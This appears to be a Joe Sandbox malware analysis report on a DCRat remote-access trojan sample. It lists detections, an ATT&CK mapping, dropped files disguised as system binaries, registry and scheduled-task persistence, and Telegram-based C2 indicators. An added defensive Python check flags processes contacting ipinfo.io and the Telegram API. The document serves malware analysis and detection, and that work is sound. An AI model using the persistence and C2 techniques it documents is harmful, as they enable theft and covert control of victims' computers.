                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                            Source: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exeQueries volume information: C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe VolumeInformation
                            Source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exeQueries volume information: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe VolumeInformation
                            Source: C:\Recovery\ctfmon.exeQueries volume information: C:\Recovery\ctfmon.exe VolumeInformation
                            Source: C:\Users\user\Desktop\LzmJLVB41K.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                            Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LzmJLVB41K.exe PID: 2016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884, type: MEMORYSTR
Source: Yara match | File source: LzmJLVB41K.exe, type: SAMPLE
Source: Yara match | File source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\ctfmon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED
Source: Yara match | File source: LzmJLVB41K.exe, type: SAMPLE
Source: Yara match | File source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\ctfmon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED

                            Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2376236746.00000000130C6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: LzmJLVB41K.exe PID: 2016, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: fozAQGvSmfTQIywuzSgk.exe PID: 7884, type: MEMORYSTR
Source: Yara match | File source: LzmJLVB41K.exe, type: SAMPLE
Source: Yara match | File source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.2160562752.00000000009E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\ctfmon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED
Source: Yara match | File source: LzmJLVB41K.exe, type: SAMPLE
Source: Yara match | File source: 0.0.LzmJLVB41K.exe.9e0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe, type: DROPPED
Source: Yara match | File source: C:\Recovery\ctfmon.exe, type: DROPPED
Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe, type: DROPPED
MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures mapped to that technique; cells without a number were not observed for this sample)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Scripting (1) | Valid Accounts | Windows Management Instrumentation (11) | Scripting (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping | File and Directory Discovery (2) | Taint Shared Content (1) | Archive Collected Data (11) | Web Service (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job (1) | DLL Side-Loading (1) | Process Injection (11) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (14) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Scheduled Task/Job (1) | Scheduled Task/Job (1) | Obfuscated Files or Information (2) | Security Account Manager | Security Software Discovery (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Encrypted Channel (11) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Registry Run Keys / Startup Folder (31) | Registry Run Keys / Startup Folder (31) | Software Packing (12) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Non-Application Layer Protocol (3) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | DLL Side-Loading (1) | LSA Secrets | Virtualization/Sandbox Evasion (31) | SSH | Keylogging | Application Layer Protocol (4) | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | File Deletion (1) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (133) | DCSync | Remote System Discovery (1) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (31) | Proc Filesystem | System Network Configuration Discovery (11) | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (11) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (ID 1557447, sample LzmJLVB41K.exe, start date 18/11/2024, architecture WINDOWS, score 100)

The graph image itself is not reproduced; the nodes and edges it contained are listed below. Numbers in parentheses after a process are the graph's per-node counters (created registry values and created files, per the graph legend).

Root
  Contacted domains: api.telegram.org (signature: Uses the Telegram API (likely for C&C communication)); ipinfo.io
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 13 other signatures
  Started processes: LzmJLVB41K.exe (24, 40); ctfmon.exe (3); fozAQGvSmfTQIywuzSgk.exe (3); 8 other processes

LzmJLVB41K.exe
  Network: api.telegram.org 149.154.167.220:443 (source ports 49739, 49993; TELEGRAMRU, United Kingdom); ipinfo.io 34.117.59.81:443 (source ports 49726, 49733; GOOGLE-AS-APGoogleAsiaPacificPteLtdSG, United States)
  Dropped: C:\Windows\Vss\...\fozAQGvSmfTQIywuzSgk.exe (PE32); C:\Users\user\Desktop\zxBbjKdN.log (PE32); C:\Users\user\Desktop\yRglcgIV.log (PE32); 14 other malicious files
  Signatures: Creates an undocumented autostart registry key; Creates multiple autostart registry keys; Creates an autostart registry key pointing to binary in C:\Windows; 3 other signatures
  Started processes: cmd.exe; csc.exe (4); csc.exe (4); 7 other processes

ctfmon.exe
  Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file

cmd.exe
  Signatures: Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks
  Started processes: 4 other processes

csc.exe (first instance)
  Dropped: C:\Program Files (x86)\...\msedge.exe (PE32)
  Signatures: Infects executable files (exe, dll, sys, html)
  Started processes: conhost.exe; cvtres.exe (1)

csc.exe (second instance)
  Dropped: C:\Windows\...\SecurityHealthSystray.exe (PE32)
  Started processes: conhost.exe; cvtres.exe (1)

7 other processes (children of LzmJLVB41K.exe)
  Signatures: Loading BitLocker PowerShell Module
  Started processes: conhost.exe (three instances); 4 other processes
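The graph shows the sample itself, not a browser or messaging client, opening TLS sessions to ipinfo.io and then to api.telegram.org, which is what the "Uses the Telegram API (likely for C&C communication)" signature keys on: a public geolocation lookup followed by traffic to a messenger bot API from the same unsigned process. The following Python is an added example and not part of the Joe Sandbox report; it turns that observation into a reusable check over process-to-destination records. The service list and the set of processes expected to reach those services are assumptions an analyst would maintain, and the records are constructed from the graph above plus one benign browser record for contrast.

```python
"""Egress triage over sandbox connection records.
Added example; not part of the Joe Sandbox report. The service list and the
client allowlist are assumptions, not values taken from the report."""
from collections import defaultdict

# Destinations commonly abused by commodity RATs (assumption: analyst-maintained list).
ABUSED_SERVICES = {
    "api.telegram.org": "messenger API, commonly abused as C2/exfil transport",
    "ipinfo.io": "public IP / geolocation lookup, used for victim profiling",
}
# Processes expected to reach those destinations (assumption: browsers and the Telegram client).
EXPECTED_CLIENTS = {"msedge.exe", "chrome.exe", "firefox.exe", "telegram.exe"}
PAIRING_NOTE = "profiling lookup and messenger API from the same process: likely C2/exfil"


def triage_connections(records):
    """records: iterable of (process, host, ip, port) tuples.

    Returns {process: [(host, reason), ...]} for each process outside EXPECTED_CLIENTS
    that contacted an abused service. Repeated sessions to the same host are collapsed.
    A process that reached both the profiling service and the messenger API gets an
    extra ("*", PAIRING_NOTE) entry, since that combination is the pattern the report
    flags for the sample."""
    seen = defaultdict(dict)                     # process -> {host: reason}
    for proc, host, ip, port in records:
        if host in ABUSED_SERVICES and proc.lower() not in EXPECTED_CLIENTS:
            seen[proc][host] = f"{ABUSED_SERVICES[host]} via {ip}:{port}"
    verdicts = {}
    for proc, by_host in seen.items():
        reasons = list(by_host.items())
        if "ipinfo.io" in by_host and "api.telegram.org" in by_host:
            reasons.append(("*", PAIRING_NOTE))
        verdicts[proc] = reasons
    return verdicts


# Constructed from the behaviour graph in this report, plus one benign browser record.
RECORDS = [
    ("LzmJLVB41K.exe", "ipinfo.io", "34.117.59.81", 443),            # source port 49726
    ("LzmJLVB41K.exe", "ipinfo.io", "34.117.59.81", 443),            # source port 49733
    ("LzmJLVB41K.exe", "api.telegram.org", "149.154.167.220", 443),  # source port 49739
    ("LzmJLVB41K.exe", "api.telegram.org", "149.154.167.220", 443),  # source port 49993
    ("msedge.exe", "ipinfo.io", "34.117.59.81", 443),                # constructed, benign
]

if __name__ == "__main__":
    for proc, reasons in triage_connections(RECORDS).items():
        for host, reason in reasons:
            print(f"{proc}: {host}: {reason}")
```

The allowlist is deliberately by process name only; on a real host pair it with the parent process and the image's Authenticode signature, because this same report shows msedge.exe being overwritten in place, so a browser name alone is not proof of a browser.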

Submitted sample

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
LzmJLVB41K.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
LzmJLVB41K.exe | 100% | Avira | HEUR/AGEN.1323342 |
LzmJLVB41K.exe | 100% | Joe Sandbox ML | |

Dropped files

Source | Detection | Scanner | Label | Link
--- | --- | --- | --- | ---
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Recovery\ctfmon.exe | 100% | Avira | HEUR/AGEN.1323342 |
C:\Users\user\AppData\Local\Temp\Kg1DnkFEGg.bat | 100% | Avira | BAT/Delbat.C |
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | 100% | Joe Sandbox ML | |
C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | 100% | Joe Sandbox ML | |
C:\Recovery\ctfmon.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | 100% | Joe Sandbox ML | |
C:\Program Files (x86)\AutoIt3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\ctfmon.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Recovery\fozAQGvSmfTQIywuzSgk.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\KlfRTWYv.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Users\user\Desktop\PYxQwTnj.log | 4% | ReversingLabs | |
C:\Users\user\Desktop\QMBYhgjh.log | 24% | ReversingLabs | |
C:\Users\user\Desktop\rUslzROg.log | 5% | ReversingLabs | |
C:\Users\user\Desktop\yRglcgIV.log | 8% | ReversingLabs | |
C:\Users\user\Desktop\zxBbjKdN.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                            No Antivirus matches
                            No Antivirus matches
                            No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ipinfo.io | 34.117.59.81 | true | false | | high
api.telegram.org | 149.154.167.220 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://ipinfo.io/country | false | | high
https://ipinfo.io/ip | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org | LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://api.telegram.org/bot | LzmJLVB41K.exe, 00000000.00000002.2309885143.00000000015A2000.00000002.00000001.01000000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000033F2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ipinfo.io | LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037CD000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000022.00000002.2447636860.0000016462AA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B544F7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024118207000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736478000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000022.00000002.3739159881.00000164728F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.3784312347.0000019B64346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.3723381092.0000024128057000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.3741199181.00000277462C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.3637871775.0000019BBDC77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000002B.00000002.3722297337.000001E46C287000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP | powershell.exe, 00000022.00000002.2447636860.0000016462881000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://api.telegram.org | LzmJLVB41K.exe, 00000000.00000002.2317415520.000000000342E000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000023.00000002.2450393544.0000019B542D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000025.00000002.2439053732.0000024117FE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000027.00000002.2438216761.0000027736251000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2433495607.0000019BADC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000002B.00000002.2446559445.000001E45C211000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000002B.00000002.2446559445.000001E45C462000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ipinfo.io | LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000031BD000.00000004.00000800.00020000.00000000.sdmp, LzmJLVB41K.exe, 00000000.00000002.2317415520.00000000037B0000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                                                        • No. of IPs < 25%
                                                                        • 25% < No. of IPs < 50%
                                                                        • 50% < No. of IPs < 75%
                                                                        • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | | 62041 | TELEGRAMRU | false
34.117.59.81 | ipinfo.io | United States | | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1557447
Start date and time: 2024-11-18 09:16:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 56
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: LzmJLVB41K.exe
renamed because original name is a hash value
Original Sample Name: 2d756772bc00e5778d794c107358ddf7.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@49/66@3/2
EGA Information: Failed
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, schtasks.exe
• Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fbiopenup.top, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target LzmJLVB41K.exe, PID 2016 because it is empty
• Execution Graph export aborted for target LzmJLVB41K.exe, PID 432 because it is empty
• Execution Graph export aborted for target ctfmon.exe, PID 1220 because it is empty
• Execution Graph export aborted for target ctfmon.exe, PID 7020 because it is empty
• Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 3192 because it is empty
• Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 3648 because it is empty
• Execution Graph export aborted for target fozAQGvSmfTQIywuzSgk.exe, PID 7884 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: LzmJLVB41K.exe
Time | Type | Description
03:17:10 | API Interceptor | 36x Sleep call for process: LzmJLVB41K.exe modified
03:17:17 | API Interceptor | 132x Sleep call for process: powershell.exe modified
09:17:06 | Task Scheduler | Run new task: fozAQGvSmfTQIywuzSgk path: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
09:17:06 | Task Scheduler | Run new task: fozAQGvSmfTQIywuzSgkf path: "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
09:17:08 | Task Scheduler | Run new task: ctfmon path: "C:\Recovery\ctfmon.exe"
09:17:08 | Task Scheduler | Run new task: ctfmonc path: "C:\Recovery\ctfmon.exe"
09:17:08 | Task Scheduler | Run new task: fontdrvhost path: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:17:09 | Task Scheduler | Run new task: fontdrvhostf path: "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:17:10 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
09:17:11 | Task Scheduler | Run new task: LzmJLVB41K path: "C:\Users\user\Desktop\LzmJLVB41K.exe"
09:17:11 | Task Scheduler | Run new task: LzmJLVB41KL path: "C:\Users\user\Desktop\LzmJLVB41K.exe"
09:17:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
09:17:28 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:17:37 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
09:17:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
09:17:55 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
09:18:04 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:18:12 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
09:18:21 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fozAQGvSmfTQIywuzSgk "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
09:18:30 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run ctfmon "C:\Recovery\ctfmon.exe"
09:18:39 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run fontdrvhost "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:18:47 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run LzmJLVB41K "C:\Users\user\Desktop\LzmJLVB41K.exe"
09:19:05 | Autostart | Run: WinLogon Shell "C:\Recovery\fozAQGvSmfTQIywuzSgk.exe"
09:19:13 | Autostart | Run: WinLogon Shell "C:\Recovery\ctfmon.exe"
09:19:22 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\autoit3\SciTE\api\fozAQGvSmfTQIywuzSgk.exe"
09:19:30 | Autostart | Run: WinLogon Shell "C:\Program Files\Microsoft Office 15\ClientX64\fontdrvhost.exe"
09:19:38 | Autostart | Run: WinLogon Shell "C:\Windows\Vss\Writers\Application\fozAQGvSmfTQIywuzSgk.exe"
09:19:47 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\LzmJLVB41K.exe"
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
149.154.167.220 | TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 11-18-2024_xlsx.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | rCEMG242598.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | Pagamento,jpg.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse |
149.154.167.220 | yF21ypxRB7.exe | Get hash | malicious | XWorm | Browse |
149.154.167.220 | PayeeAdvice_HK54912_R0038704_37504.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | Order88983273293729387293828PDF.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse |
149.154.167.220 | download.exe | Get hash | malicious | Remcos, XWorm | Browse |
